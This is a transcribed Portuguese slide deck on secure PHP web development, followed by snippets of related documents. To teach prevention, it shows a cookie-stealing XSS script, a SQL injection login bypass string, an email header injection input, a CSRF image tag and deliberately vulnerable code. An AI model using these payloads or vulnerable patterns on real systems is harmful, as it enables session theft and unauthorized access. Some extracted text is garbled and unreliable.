Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com
|
|
- Mario Quintanilha Weber
- 8 Há anos
- Visualizações:
Transcrição
1 Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com
2 Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas formas de prevenção. Concientizar sobre a responsabilidade da segurança no desenvolvimento de uma aplicação. Abordar os tópicos de segurança que são temas do exame de certificação da Zend. Exemplo de ataques realizados em grandes sites.
3 Tópicos Introdução a Segurança. Conceitos e boas práticas. Filtrando Input. Escapando Output. Injection Attacks XSS,SQL,Command, Remote Code, . XSRF / CSRF Segurança na Sessão. Session Fixation. Session Hijacking. Configurações de segurança no php.ini. Shared Hosting.
4 Introdução a Segurança Responsabilidade pela Segurança. Princípios de um desenvolvimento seguro para aplicações Web. Você pode confiar nos dados que estão sendo processados? Quais os dados confiáveis? Como o maioria dos ataques podem ser evitados? Tenha em mente a importância de se desenvolver uma aplicação segura.
5 Filtrando Input. Exemplo: <form action= login.php method= post > Usuário: <input type= text name= usuario /><br /> Senha: <input type= passsword name= senha /><br /> Empresa: <select name= id_empresa > <option>nacional</option> <option>internacional</option> <option>filial</option> </select><br/> <input type= submit value= Enviar /> </form>
6 Filtrando Input Regras de Validação: Usuário deve ser caracteres alfabéticos. Senha deve ser alfanumérico. Empresa deve conter somente 'nacional', 'internacional' ou 'filial'. Validar no lado do cliente (Javascript) ou no lado do Servidor?
7 Filtrando Input Validando no lado do servidor: <?php $clean = array(); if (ctype_alpha($_post['usuario'])) { $clean['usuario'] = $_POST['usuario']; } if (ctype_alnum($_post['senha'])) { $clean['senha'] = $_POST['senha']; } $empresas = arrray('nacional', 'internacional', 'filial'); if (in_array($_post['empresa'], $empresas)) { $clean['empresa'] = $_POST['empresa']; }
8 Filtrando Input Validando: <?php $errors = array (); if (!array_key_exists('usuario', $clean)){ $errors[] = 'Campo usuário inválido. Usar somente caracteres alfabéticos.'; }
9 Escapando Output Qual a importância de escapar output? Escapar output deve fazer parte do filtro de input? Escapando output de acordo com o destino: Web Browser e Database Escapar output Web Browser: htmlentities / htmlspecialchars: $message = "A 'quote' is <b>bold</b>"; Outputs: A 'quote' is <b>bold</b> $html['message'] = htmlentities($message, ENT_QUOTES, 'UTF-8');
10 Escapando Output Escapar output para Database: *_escape_string: $sql = "SELECT * FROM usuarios WHERE usuario = ". mysql_real_escape_string($usuario); Prepared statements: $sql = 'SELECT * FROM usuarios WHERE usuario = :usuario AND senha = :senha'; $sth = $pdo->prepare($sql); $sth->execute(array( ':username' => $clean['username'], ':senha' => $clean['senha'])); $results = $sth->fetchall();
11 Escapando Output $sql = "SELECT * FROM usuarios WHERE usuario =? AND senha =?"; $sth = $pdo->prepare($sql); $sth->execute(array($clean['username'], $clean['senha'])); $results = $sth->fetchall();
12 Cross-Site Scripting É um dos mais conhecidos e um mais comuns dos tipos de ataque. Explora a confiança que o usuário tem na aplicação. O foco esta no roubo de informações pessoais do usuários, como por exemplo, os cookies. Exemplo: <form method= POST action= adiciona_comentario.php > <p><textarea name= comment ></textarea></p> <p><input type= submit /></p> </form>
13 Cross-Site Scripting <script> document.location = ' + document.cookie; </script> Para previnir-se do ataque, faça escape do output utilizando htmlentities. $html['message'] = htmlentities($message, ENT_QUOTES, 'UTF-8');
14 Cross-Site Scripting - Casos Worm Bom Sábado. Afetou o orkut, descoberto 25/09/2010. Redireciona para comunidade infectados vírus orkut Inscreve o usuário em comunidades maliciosas Rouba informações presentes nos cookies Envia scrap contaminado para lista de amigos
15 Cross-Site Scripting - Casos Twitter 21/09/2010 Ao passar o mouse por cima do link bagunçava a interface Espalhava o problema para outros usuários Impediu que usuários publicassem mensagens no twitter
16 Cross-Site Scripting - Casos Site contendo arquivo de sites que já foram vuneráveis à ataques XSS.
17 SQL Injection É um ataque no qual o usuário malicioso injetam comandos sql em campos de formulários. Primeiro o atacante obtém informações suficientes para realizar o ataque, normalmente através de mensagens de erro do banco de dados. Um exemplo popular é o formulário de Login: <form method= POST action= login.php > Username: <input type= text name= username /> <br /> Senha: <input type= password name= senha /><br /> <input type= submit value= Login > </form>
18 SQL Injection O Código Vulenerável: $sql = "SELECT FROM WHERE AND count(*) usuarios usuario = '{$_POST['usuario']}' senha= '{$_POST['senha']}'"; Nesse caso não é feito o filtro de input. Nada é escapado.
19 SQL Injection Pode-se logar no sistema, passando no campo de usuário o seguinte conteúdo: (Independente do que é passado no campo de senha.) admin' OR 1=1 -SELECT * FROM usuarios WHERE usuario = 'admin' OR 1 = 1 -- ' AND senha = 'senhaqualquer' Para previnir sql injection, utilizar *_escape_string() ou de preferência prepared statements. Podem ocorrer problemas mais graves, como exclusão de tabelas e dados importantes.
20 SQL Injection - Casos Cisco WCS 11/08/2010 (Wireless Control System) SQL Injection na interface web WCS Permite total acesso no device: Criação, exclusão e edição de usuários Mudança nas configurações wireless
21 SQL Injection - Casos Em 2008 houve um ataque em massa de SQL Injection Exploração nos servidores usando IIS e SQLServer Milhares de sites afetados ( )
22 Command Injection Tome cuidado ao utilizar o input de usuário para montar comandos dinâmicos ao utilizar as funções 'exec', 'system', 'passthru'. Evite sempre que possível utilizar funções que executem comandos no shell. (Boas práticas) Se não tiver outra opção, evite utilizar o input de usuário para criar os comandos shell. Se for ter que utilizar o input de usuário para montar os comando shell, você pode fazer uso das funções escapeshellcmd() e escapeshellarg()
23 Remote Code Injection Tome cuidado ao usar o input do usuário para fazer um include dinâmico na sua aplicação. Muitas aplicações se baseiam no input do usuário para criar includes em sua aplicação. Exemplo: include "{$_GET['secao']}/config.php"; Um usuário mal intencionado pode manipular a query string e criar uma URL que irá "injetar" um arquivo em um site remoto.
24 Remote Code Injection Para se prevenir desse ataque, utilize o filtro de input adequado. Verificando se o arquivo a ser incluído existe em disco. Criar um array com os nomes dos arquivos permitidos. Remover caracteres inválidos do input. Outra forma de se prevenir é desabilitando a diretiva allow_url_fopen do php.ini.
25 Injection Função mail() do PHP Cuidado ao usar dados de input do usuário para configurar os headers do . Injeção de pode ser explorado em formulários de contato mal elaborados. A falha permite que usuários maliciosos enviem spam sem seu consentimento.
26 Injection Código vulnerável: $ _origem = $_POST[' ']; mail("nome-destino@exemplo.com.br", "Contato via form", $message, "From: $ _origem" );
27 Injection Código vulnerável: $ _origem = $_POST[' ']; mail("nome-destino@exemplo.com.br", "Contato via form", $message, "From: $ _origem" ); Input do usuário: 1@exemplo.com.br (quebra de linha) CC: 2@exemplo.com.br, 3@exemplo.com.br, etc..
28 Injection Prevenção: Tratando: $ _origem = preg_replace("/[\r\n]/",'',$ _origem); Validando: if (preg_match( "/[\r\n]/", $ _origem) ) { // [... redireciona o usuário para uma página de erro e sai da aplicação...] }
29 Injection O de destino também pode ser forjado pelo input do usuário. A função mail() aceita vários endereços de no destinatário. (separados por vírgula): 1@exemplo.com.br, 2@exemplo.com.br, etc..
30 XSRF ou CSRF O ataque consiste em forjar requisições de outros usuários. Explora a confiança que a aplicação tem no usuário. É difícil de identificar pois para a aplicação parece ser uma requisição legítima. Exemplo: Atacante analisando o formulário: <form action="/transfer.php" method="post"> <p>to <input type="text" name="to" /></p> <p>valor $<input type="text" name="valor" /></p> <p><input type="submit" value="transferir" /></p> </form>
31 transfer.php: <?php $clean = array(); session_start(); if ($_SESSION['auth']) { /* Filter To */ /* Filter Valor */ /* Make Transfer */ transfer($clean['to'], $clean['valor']); }?>
32 XSRF Forjando GET. Usuário acessando site malicioso e logado no site do banco em outra aba. <img src=" /> É possível forjar POST também.
33 XSRF Prevenção: Guarde um token randômico na sessão e sete no formulário que deseja proteger. Valide se o token esta correto na próxima requisição: $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; if ($_SESSION['token'] == $_POST['token']) { /* valido */ }
34 XSRF - Casos Gmail afetado em Afeta usuários logados no gmail e acessando o site malicioso em outra aba. O site malicioso conseguia obter todos os detalhes dos contatos do usuário do gmail.
35 Session Fixation Basicamente, como funciona o processo de criação de sessão no PHP? session_start() Set_Cookie Header Nome do Cookie: PHPSESSID Fixando Sessão: <a href= PHPSESSID= > Entrar</a>
36 Session Fixation Explorado em versões antigas do php onde muita gente desabilitava os cookies no navegador. Para que seja possível explorar essa vunlerabilidade, definir os parâmetros abaixo no php.ini: session.use_only_cookies = Off (Padrão On) session.use_trans_sid = On (Padrão Off)
37 Session Fixation Protegendo-se contra o ataque de session fixation: session_regenerate_id() <?php session_start(); if(usuario_autenticado($clean['usuario'], $clean['senha'])) { session_regenerate_id(); $_SESSION['logado'] = true; }
38 Session Fixation - Casos Joomla versão 1.5 até Após autenticação o id da sessão não era re-criado
39 Session Hijacking Como é feito o ataque de session hijacking? Como se prevenir? Validar HTTP_USER_AGENT Setar no php.ini: session.cookie_httponly = true
40 Session Hijacking <?php session_start(); if (array_key_exists('http_user_agent', $_SESSION)) { if ($_SESSION['HTTP_USER_AGENT']!= md5($_server['http_user_agent'])) { /* Acesso inválido. O header User-Agent mudou durante a mesma sessão. */ exit; } } else { /* Primeiro acesso do usuário, vamos gravar na sessão um hash md5 do header UserAgent */ $_SESSION['HTTP_USER_AGENT'] = md5($_server['http_user_agent']); }?>
41 Configurações no php.ini register_globals Variaveis são injetadas no seu código. É impossível determinar a origem dos dados. Exemplo: if (checklogin()) { $loggedin = TRUE; }... if ($loggedin) { }
42 Configurações no php.ini register_globals Sempre utilizar $_GET, $_POST, $_COOKIE, $_SESSION Em versões >= O padrão é Off. Removido do php à partir da versão session.cookie_httponly ativa o parâmetro httponly no cookie usado para identificar a sessão do usuário expose_php "Expoê" a versão do php instalado no servidor web.
43 Shared Hosting safe_mode? Removido do php 6.0 Alternativa (php.ini): open_basedir disable_functions disable_classes
44 Shared Hosting open_basedir: Limita os locais onde o php pode abrir/incluir arquivos. Usando open_basedir com VirtualHost: <Directory /home/usuario1> php_admin_value open_basedir /home/usuario1 </Directory> disable_functions: Desabilitar funções potencialmente perigosas disable_functions = exec,passthru,shell_exec,system
45 Shared Hosting disable_classes: Desabilitar classes potencialmente "perigosas" disable_classes = DirectoryIterator,Directory Protegendo sessões em hosts compartilhados usando session_set_save_handler: session_set_save_handler( '_open', '_close', '_read', '_write', '_destroy', '_clean');
46 Continuando os estudos OWASP - The Open Web Application Security Project PHP Security Consortium
47 Fale Conosco Obrigado por Assistir! Mais informações: com Fone:
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas
Leia maisSegurança Web com PHP 5
Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos
Leia maisXSS - CROSS-SITE SCRIPTING
Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente
Leia maisSegurança em Sistemas Web. Addson A. Costa
Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.
Leia maisSegurança em aplicações Web. Exemplos e Casos Práticos em
Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header
Leia maisSegurança em PHP. Edgar Rodrigues Sandi @EdgarSandi edgar@season.com.br. @EdgarSandi
Segurança em PHP Edgar Rodrigues Sandi edgar@season.com.br Gerente de projetos Desenvolvedor PHP e Java Ministra os treinamentos: Linguagens de Programação PHP I Fundamentos ( Oficial Zend ) PHP II Estruturas
Leia maisNomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):
Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma
Leia maisCurso De PHP. Aula 4. Formulários. Cookies. Session. Mail
Curso De PHP Aula 4 Formulários Cookies Session Mail Formulários Nós preenchemos diariamente diversos formulários web, seja para se logar e-mail ou criar uma conta em um site. Nesta parte do curso, vamos
Leia maisAULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA
Sumário Construção de sistema Administrativo... 1 Sistema de Login... 2 SQL INJECTION... 2 Técnicas para Evitar Ataques... 2 Formulário de Login e Senha fará parte do DEFAULT... 5 LOGAR... 5 boas... 6
Leia maisProf. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1
Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:
Leia maisDesenvolvimento e disponibilização de Conteúdos para a Internet
Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,
Leia maisSegurança em PHP. Exemplos e Casos Práticos
Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST 3º Ciclo de Apresentações. 17/Março/2005 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL
Leia maisProgramação web Prof. Wladimir
Programação web Prof. Wladimir Linguagem PHP Cookie e Sessão @wre2008 1 Sumário Header; Cookie; Sessão; Exemplos. @wre2008 2 Header Esta função permite que um script php redirecione para outra página.
Leia maisVULNERABILIDADES WEB v.2.2
VULNERABILIDADES WEB v.2.2 $ whoami Sgt NILSON Sangy Computer Hacking Forensic Investigator Analista de Segurança da Informação Guerreiro Cibernético $ ls -l /etc 1. Contextualização 2. OWASP 2.1. Injeção
Leia maisCláudio Borges cborges@openbsd sp.org
Cláudio Borges cborges@openbsd sp.org O Que será abordado O porque da segurança. Diretivas e funções perigosas. Configurando o open_basedir e disable_functions. Utilizando as diretivas php_flag e php_value.
Leia maisPHP (Seções, Cookies e Banco de Dados)
PHP (Seções, Cookies e Banco de Dados) André Tavares da Silva andre.silva@udesc.br Seções Basicamente, as seções são métodos que preservam determinados dados ativos enquanto o navegador do cliente estiver
Leia maisAplicação web protegida
Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos
Leia maisProgramação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza
Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões Prof. MSc. Hugo Souza Se você precisar manter informações sobre seus usuários enquanto eles navegam pelo seu site, ou até quando eles saem
Leia maisO atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.
Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)
Leia maisBoas Práticas de Desenvolvimento Seguro
Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO
Leia maisSegurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com
UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel
Leia maisBool setcookie (string nome [, string valor [, int validade [, string caminho [, string dominio [, int seguro]]]]] )
Disciplina: Tópicos Especiais em TI PHP Este material foi produzido com base nos livros e documentos citados abaixo, que possuem direitos autorais sobre o conteúdo. Favor adquiri-los para dar continuidade
Leia maisEstável. Rápida. Simples. Poderosa. Bem documentada. Multi- plataforma. Extensivel.
Conteúdo: Porque PHP? Porque cuidar da segurança é tão importante? Cuidados com diretivas e funções. Register_globals. Utilizando php_flag e php_value. Logs e exibição de erros. Programando com segurança.
Leia maisProgramação WEB II. Sessions e Cookies. progweb2@thiagomiranda.net. Thiago Miranda dos Santos Souza
Sessions e Cookies progweb2@thiagomiranda.net Conteúdos Os materiais de aula, apostilas e outras informações estarão disponíveis em: www.thiagomiranda.net Cookies e Sessions Geralmente, um bom projeto
Leia maisProgramando em PHP. Conceitos Básicos
Programando em PHP www.guilhermepontes.eti.br lgapontes@gmail.com Conceitos Básicos Todo o escopo deste estudo estará voltado para a criação de sites com o uso dos diversos recursos de programação web
Leia maisAtaques a Aplicações Web
Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa http://www.carlosnilton.com.br/ ccorrea@unimedrj.com.br @cnacorrea Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL
Leia maisFonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu
Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de
Leia maisAnálise de Vulnerabilidades em Aplicações WEB
Análise de Vulnerabilidades em Aplicações WEB Apresentação Luiz Vieira Construtor 4Linux Analista e Consultor de Segurança 15 anos de experiência em TI Pen-Tester Articulista sobre Segurança de vários
Leia maisTransações Seguras em Bancos de Dados (MySQL)
Transações Seguras em Bancos de Dados (MySQL) Índice Entendendo os storage engines do MySQL 5 1 As ferramentas 1 Mais algumas coisas que você deve saber 1 Com a mão na massa 2 Mais ferramentas Usando o
Leia maisSegurança da Informação:
Segurança da Informação: Tratando dados em PHP Objetivo: O objetivo desta palestra é demonstrar os riscos inerentes de se trabalhar com informações externas à aplicações desenvolvidas em PHP, como o descuido
Leia maisAmeaças, riscos e vulnerabilidades Cont. Objetivos
Ameaças, riscos e vulnerabilidades Cont. Prof. Esp. Anderson Maia E-mail: tecnologo.maia@gmail.com Objetivos entender a definição dos termos hacker, cracker e engenharia social; compreender a anatomia
Leia maisCOMO FUNCIONA UM FORMULÁRIO
FORMULÁRIOS Constitui-se numa das formas de a máquina cliente enviar informações para que um programa no servidor receba estes dados, processe-os e devolva uma resposta ao usuário, por meio do navegador,
Leia mais13-10-2013. Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com
13-10-2013 Falha segurança Baco Cross-site scripting (XSS) e Logins por canal não seguro (http) perenboom@hmamail.com Falha segurança Baco PerenBoom Cross-site scripting (XSS) e Logins por canal não seguro
Leia maisJavaScript (Funções, Eventos e Manipulação de Formulários)
Linguagem de Programação para Web JavaScript (Funções, Eventos e Manipulação de Formulários) Prof. Mauro Lopes 1-31 23 Objetivos Iremos avançar um pouco mais em nosso estudo sobre o JavaScript. Iremos
Leia maisSegurança na WEB Ambiente WEB estático
Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores
Leia maisInstalando servidor Apache
Instalando servidor Apache Apache é um software livre de código aberto que corre mais de 50% dos servidores web do mundo. Para instalar o apache, abra um terminal e digite o comando: 1- # yum install httpd
Leia maisProgramação para Internet I
Programação para Internet I Aula 6 PHP: Include, Require, Variáveis de ambiente Prof. Teresinha Letícia da Silva leticiasfw@yahoo.com.br Inclusão de arquivos com Include e Require no PHP Uma técnica muito
Leia maisLista de Revisão. 3. Analise a afirmativa a seguir como verdadeira ou falsa e justifique.
Lista de Revisão 1. Nos sistemas web, geralmente os usuários apresentam dois problemas típicos, a desorientação e a sobrecarga cognitiva. Discorra sobre esses problemas. 2. Apresente as principais diferenças
Leia maisManual Comunica S_Line
1 Introdução O permite a comunicação de Arquivos padrão texto entre diferentes pontos, com segurança (dados criptografados e com autenticação) e rastreabilidade, isto é, um CLIENTE pode receber e enviar
Leia maisDesenvolvimento Web XHTML Formulários. Prof. Bruno E. G. Gomes
Desenvolvimento Web XHTML Formulários Prof. Bruno E. G. Gomes 2014 Introdução Um recurso bastante utilizado no desenvolvimento Web é o envio de dados de uma página para o servidor quando fornecemos informações,
Leia maiswww.coldfusionbrasil.com.br
www.coldfusionbrasil.com.br 2000 PASSANDO VARIÁVEIS ATRAVÉS DE FORM E URL 3 ALTERA.CFM 3 FORMALTERA.CFM 4 ALTERA.CFM 4 FORMALTERA.CFM 4 CRIANDO E MANIPULANDO VARIÁVEIS COM CFSET 4 VALORES ESTÁTICOS 5 PARÂMETROS
Leia maisPHP e MySQL Autenticação de Usuários
PHP e MySQL Autenticação de Usuários Programação de Servidores Marx Gomes Van der Linden http://marx.vanderlinden.com.br/ Controle de Acesso A maioria das aplicações web envolve em algum ponto um mecanismo
Leia maisSIMEC Sistema Integrado de Planejamento, Orçamento e Finanças
SIMEC Sistema Integrado de Planejamento, Orçamento e Finanças Versão 1.0 Sumário Introdução... 3 1. Estrutura da aplicação... 4 1.1 Diretórios e arquivos... 4 2. Configuração do ambiente...
Leia maisAttacking Session Management
Attacking Session Management Alexandre Villas (alequimico) Janeiro de 2012 SUMÁRIO 1. Introdução 2. Classes de ataques ao gerenciamento de sessão 1. Session Fixation 2. Predição 3. Interceptação 4. Força
Leia maisPROCEDIMENTOS PARA SERVIÇOS REALIZADOS NO PLANTÃO
PROCEDIMENTOS PARA SERVIÇOS REALIZADOS NO PLANTÃO A primeira coisa a ser verificada é a navegação dos servidores e isso será possível com o Programa PuTTY. Selecione o servidor que está na caixa Load,
Leia maisSegurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1
Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/
Leia maisSegurança em Computadores. GTI SEDU atendimento@sedu.es.gov.br
Segurança em Computadores GTI SEDU atendimento@sedu.es.gov.br Agenda Computadores Riscos principais Cuidados a serem tomados Créditos Computadores (1/4) Computador pessoal grande quantidade de dados armazenados
Leia maisAula 03 - Projeto Java Web
Aula 03 - Projeto Java Web Para criação de um projeto java web, vá em File/New. Escolha o projeto: Em seguida, na caixa Categorias selecione Java Web. Feito isso, na caixa à direita selecione Aplicação
Leia maisLinguagem de Programação III Aula 2 Revisão Parte II
Linguagem de Programação III Aula 2 Revisão Parte II Prof. Moser Fagundes Curso Técnico em Informática (Modalidade Integrada) Instituto Federal Sul-Rio-Grandense (IFSul) Campus Charqueadas Revisão de PHP
Leia maisSemana da Internet Segura Correio Eletrónico
Enviar correio eletrónico não solicitado em massa (SPAM) a outros utilizadores. Há inúmeras participações de spammers utilizando sistemas comprometidos para enviar e-mails em massa. Estes sistemas comprometidos
Leia maisLINGUAGEM DE PROGRAMAÇÃO WEB
LINGUAGEM DE PROGRAMAÇÃO WEB GABRIELA TREVISAN Formulários e Aula 3 Relembrando HTML 5 Tag Form o Utilizada para marcar a região do formulário. o Os atributos mais importantes são o method e o action.
Leia maisMaker Planet www.makerplanet.com Manual do Usuário
Maker Planet www.makerplanet.com Manual do Usuário Atenção: Este é o rascunho inicial deste documento, visite o Maker Planet.COM (HTTP://www.makerplanet.com/) para obter as atualizações deste documento.
Leia maisCapítulo 4. Programação em ASP
Índice: CAPÍTULO 4. PROGRAMAÇÃO EM ASP...2 4.1 REGISTRAR...2 4.1.1 Códigos para configuração do objeto...2 4.1.2 Formulário para transferir dados da impressão digital...3 4.1.3 Código Javascript para registro
Leia maisDesenvolvendo para WEB
Nível - Básico Desenvolvendo para WEB Por: Evandro Silva Neste nosso primeiro artigo vamos revisar alguns conceitos que envolvem a programação de aplicativos WEB. A ideia aqui é explicarmos a arquitetura
Leia maisPHP. Hypertext Pre-Processor
PHP Hypertext Pre-Processor O que é o PHP? Uma linguagem de scripting é uma linguagem cujo código não tem de ser compilado para ser executado! O código escrito é interpretado em tempo de execução para
Leia maisMANUAL MIKOGO 1. VISÃO GERAL
1. VISÃO GERAL 1.1 Informações sobre o Mikogo: Mikogo é uma ferramenta de uso e manipulação simples, permite compartilhamento de arquivos, visualização da área de trabalho remota ou compartilhamento de
Leia maisTipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel
Tipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel Tipos de pragas virtuais 1 Vírus A mais simples e conhecida das ameaças. Esse programa malicioso pode ligar-se
Leia mais(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com
(In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades
Leia maisUNIVERSIDADE FEDERAL DE PELOTAS
Usando um firewall para ajudar a proteger o computador A conexão à Internet pode representar um perigo para o usuário de computador desatento. Um firewall ajuda a proteger o computador impedindo que usuários
Leia maisPHP Seguro Ernani Azevedo (PROCERGS DRE/ARS Unix)
PHP Seguro Ernani Azevedo (PROCERGS DRE/ARS Unix) 1 Introdução A linguagem PHP, por ser muito flexível, normalmente é utilizada de forma insegura, tanto pelo desenvolvedor quanto pelos administradores
Leia maissegurança em aplicações web
segurança em aplicações web myke hamada mykesh gmail 1 whoami ciência da computação segurança da informação ruby rails c# vbscript opensource microsoft ethical hacking 2 agenda introdução ontem e
Leia maisTecnologias WEB Web 2.0
Tecnologias WEB Web 2.0 Prof. José Maurício S. Pinheiro UniFOA 2009-2 Conceitos A Web 2.0 marca uma tendência que reforça o conceito de troca de informações e colaboração entre seres humanos, sites e serviços
Leia maisQUALIDATA Soluções em Informática. Módulo CIEE com convênio empresas
FM-0 1/21 ÍNDICE 1. MÓDULO DESKTOP(SISTEMA INSTALADO NO CIEE)... 2 Cadastro de Ofertas de Empregos:... 2 Cadastro de Eventos:... 3 Cadastro de Instituições do Curriculum:... 5 Cadastro de Cursos do Curriculum:...
Leia maisO que é uma sessão. maneira de preservar dados através de acessos subsequentes.
Sessões em PHP O que é uma sessão Suporte a sessões no PHP: maneira de preservar dados através de acessos subsequentes. Características: permite a criação de aplicações mais personalizadas; permite que
Leia maisConteúdo Dinâmico. Introdução. Interação Browser x Servidor Web. Interação Browser x Servidor Web
Introdução Formulários rios & Conteúdo Dinâmico Mário Antonio Meireles Teixeira Dept o. de Informática - UFMA A Web surgiu inicialmente como uma nova forma de comunicação de informações, fazendo uso de
Leia maisLinguagem de. Aula 06. Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br
Linguagem de Programação IV -PHP Aula 06 Profa Cristiane Koehler cristiane.koehler@canoas.ifrs.edu.br Criação de Formulários o Um formulário consiste em uma série de campos que são preenchidos pelo usuário
Leia maisINTRODUÇÃO AO DESENVOLVIMENTO WEB
INTRODUÇÃO AO DESENVOLVIMENTO WEB PROFª. M.Sc. JULIANA H Q BENACCHIO Formulários Os formulários em HTML são usados para selecionar diferentes tipos de entradas do usuário. Um formulário é uma área que
Leia maisFormulário (Send & Recieve) Prof. Celso H. Masotti
Formulário (Send & Recieve) Prof. Celso H. Masotti O Send e o Recieve A partir desse momento os exercícios serão realizados com dois arquivos, um de envio de dados (send) e o que recebe esse dados (recieve)
Leia maisVamos criar uma nova Página chamada Serviços. Clique em Adicionar Nova.
3.5 Páginas: Ao clicar em Páginas, são exibidas todas as páginas criadas para o Blog. No nosso exemplo já existirá uma página com o Título Página de Exemplo, criada quando o WorPress foi instalado. Ao
Leia mais3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança
3 SERVIÇOS IP 3.1 Serviços IP e alguns aspectos de segurança Os serviços IP's são suscetíveis a uma variedade de possíveis ataques, desde ataques passivos (como espionagem) até ataques ativos (como a impossibilidade
Leia maisINSTALANDO E CONFIGURANDO O MY SQL
INSTALANDO E CONFIGURANDO O MY SQL Este tutorial tem como objetivo mostrar como instalar o banco de dados My SQL em ambiente Windows e é destinado aqueles que ainda não tiveram um contato com a ferramenta.
Leia maisIntrodução ao PHP. Prof. Késsia Marchi
Introdução ao PHP Prof. Késsia Marchi PHP Originalmente PHP era um assíncrono para Personal Home Page. De acordo com convenções para atribuições de nomes recursivas do GNU foi alterado para PHP Hypertext
Leia mais1. Introdução pág.3 2. Apresentação do sistema Joomla! pág.4 3. Acessando a administração do site pág.4 4. Artigos 4.1. Criando um Artigo 4.2.
1. Introdução pág.3 2. Apresentação do sistema Joomla! pág.4 3. Acessando a administração do site pág.4 4. Artigos 4.1. Criando um Artigo 4.2. Editando um Artigo 4.3. Excluindo um Artigo 4.4. Publicar
Leia maisProgramação WEB. Prof. André Gustavo Duarte de Almeida andre.almeida@ifrn.edu.br docente.ifrn.edu.br/andrealmeida. Aula III Introdução PHP
Programação WEB Prof. André Gustavo Duarte de Almeida andre.almeida@ifrn.edu.br docente.ifrn.edu.br/andrealmeida Aula III Introdução PHP Introdução PHP PHP=Hypertext Pre-Processor Linguagem de script open
Leia maisEscrito por Sáb, 15 de Outubro de 2011 01:19 - Última atualização Seg, 26 de Março de 2012 03:32
Preço R$ 129.00 Compre aqui Curso de PHP O.O usando Adodb, aprenda a criar uma loja virtual (carrinho de compras) até a geração do boleto bancário. Usei: Mysql e Dreamweaver cs4. São 163 videoaulas, 2
